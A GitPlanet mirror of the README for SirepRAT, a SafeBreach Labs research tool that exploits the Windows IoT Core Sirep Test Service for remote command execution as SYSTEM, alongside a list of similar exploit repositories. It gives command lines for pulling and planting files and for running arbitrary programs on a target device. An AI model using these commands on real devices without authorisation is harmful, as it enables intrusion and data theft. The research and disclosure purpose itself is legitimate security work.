GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects β†’ SafeBreach-Labs β†’ Sireprat

SafeBreach-Labs / Sireprat

Licence: bsd-3-clause
Remote Command Execution as SYSTEM on Windows IoT Core (releases available for Python2.7 & Python3)

Programming Languages

python
139335 projects - #7 most used programming language

Labels

raspberry-piexploitraspberrypirce

Projects that are alternatives of or similar to Sireprat

Commodity Injection Signatures
Commodity Injection Signatures, Malicious Inputs, XSS, HTTP Header Injection, XXE, RCE, Javascript, XSLT
Stars: ✭ 267 (-18.1%)
Mutual labels:  exploit, rce
Raspberry Pi Cross Compilers
Latest GCC Cross Compiler & Native (ARM & ARM64) CI generated precompiled standalone toolchains for all Raspberry Pis. πŸ‡
Stars: ✭ 261 (-19.94%)
Mutual labels:  raspberry-pi, raspberrypi
My Pihole Blocklists
Create custom pi-hole blocklists
Stars: ✭ 269 (-17.48%)
Mutual labels:  raspberry-pi, raspberrypi
Exploit Cve 2017 7494
SambaCry exploit and vulnerable container (CVE-2017-7494)
Stars: ✭ 265 (-18.71%)
Mutual labels:  exploit, rce
Pifmadv
Advanced Raspberry Pi FM transmitter with RDS encoding
Stars: ✭ 316 (-3.07%)
Mutual labels:  raspberry-pi, raspberrypi
Pigeon
Pigeon is a simple 3D printed cloud home surveillance camera project that uses the new Raspberry Pi Zero W
Stars: ✭ 266 (-18.4%)
Mutual labels:  raspberry-pi, raspberrypi
Cve 2019 1003000 Jenkins Rce Poc
Jenkins RCE Proof-of-Concept: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)
Stars: ✭ 270 (-17.18%)
Mutual labels:  exploit, rce
CVE-2021-41773 CVE-2021-42013
Apache HTTP Server 2.4.49, 2.4.50 - Path Traversal & RCE
Stars: ✭ 20 (-93.87%)
Mutual labels:  exploit, rce
Raspap Webgui
Simple wireless AP setup & management for Debian-based devices
Stars: ✭ 3,383 (+937.73%)
Mutual labels:  raspberry-pi, raspberrypi
Penetration testing poc
ζΈ—ι€ζ΅‹θ―•ζœ‰ε…³ηš„POC、EXPγ€θ„šζœ¬γ€ζζƒγ€ε°ε·₯ε…·η­‰---About penetration-testing python-script poc getshell csrf xss cms php-getshell domainmod-xss penetration-testing-poc csrf-webshell cobub-razor cve rce sql sql-poc poc-exp bypass oa-getshell cve-cms
Stars: ✭ 3,858 (+1083.44%)
Mutual labels:  rce, exploit
Exploit-Development
Exploit Development - Weaponized Exploit and Proof of Concepts (PoC)
Stars: ✭ 84 (-74.23%)
Mutual labels:  exploit, rce
Rpisurv
Raspberry Pi surveillance
Stars: ✭ 293 (-10.12%)
Mutual labels:  raspberry-pi, raspberrypi
Umbraco-RCE
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution
Stars: ✭ 61 (-81.29%)
Mutual labels:  exploit, rce
Jenkins Rce
😈 Jenkins RCE PoC. From unauthenticated user to remote code execution, it's a hacker's dream!
Stars: ✭ 262 (-19.63%)
Mutual labels:  exploit, rce
PwnX.py
πŸ΄β€β˜ οΈ Pwn misconfigured sites running ShareX custom image uploader API through chained exploit
Stars: ✭ 30 (-90.8%)
Mutual labels:  exploit, rce
Glodroid manifest
Android manifest for GloDroid (AOSP for the world's most accessible development platforms)
Stars: ✭ 266 (-18.4%)
Mutual labels:  raspberry-pi, raspberrypi
SAP vulnerabilities
DoS PoC's for SAP products
Stars: ✭ 47 (-85.58%)
Mutual labels:  exploit, rce
exploit-CVE-2015-3306
ProFTPd 1.3.5 - (mod_copy) Remote Command Execution exploit and vulnerable container
Stars: ✭ 97 (-70.25%)
Mutual labels:  exploit, rce
Raspibackup
Backup and restore your running Raspberry
Stars: ✭ 268 (-17.79%)
Mutual labels:  raspberry-pi, raspberrypi
Pisugar
PiSugar is a battery module for Raspberry Pi zero / zero W / zero WH
Stars: ✭ 287 (-11.96%)
Mutual labels:  raspberry-pi, raspberrypi
View All Similar Projects βž”

SirepRAT

SirepRAT - RCE as SYSTEM on Windows IoT Core

SirepRAT Features full RAT capabilities without the need of writing a real RAT malware on target.

Context

The method is exploiting the Sirep Test Service that’s built in and running on the official images offered at Microsoft’s site. This service is the client part of the HLK setup one may build in order to perform driver/hardware tests on the IoT device. It serves the Sirep/WPCon/TShell protocol.

We broke down the Sirep/WPCon protocol and demonstrated how this protocol exposes a remote command interface for attackers, that include RAT abilities such as get/put arbitrary files on arbitrary locations and obtain system information.

Based on the findings we have extracted from this research about the service and protocol, we built a simple python tool that allows exploiting them using the different supported commands. We called it SirepRAT.

It features an easy and intuitive user interface for sending commands to a Windows IoT Core target. It works on any cable-connected device running Windows IoT Core with an official Microsoft image.

Slides and White Paper

Slides and research White Paper are in the docs folder

Setup

pip install -r requirements.txt

Usage

Download File

python SirepRAT.py 192.168.3.17 GetFileFromDevice --remote_path "C:\Windows\System32\drivers\etc\hosts" --v

Upload File

python SirepRAT.py 192.168.3.17 PutFileOnDevice --remote_path "C:\Windows\System32\uploaded.txt" --data "Hello IoT world!"

Run Arbitrary Program

python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe"

With arguments, impersonated as the currently logged on user:

python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"

(Try to run it without the as_logged_on_user flag to demonstrate the SYSTEM execution capability)

Get System Information

python SirepRAT.py 192.168.3.17 GetSystemInformationFromDevice

Get File Information

python SirepRAT.py 192.168.3.17 GetFileInformationFromDevice --remote_path "C:\Windows\System32\ntoskrnl.exe"

See help for full details:

python SirepRAT.py --help

Author

Dor Azouri (@bemikre)

Contributors

movatica (@movatica) - porting to python 3! (at the finish line of 2020)

License

BSD 3 - clause "New" or "Revised" License

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].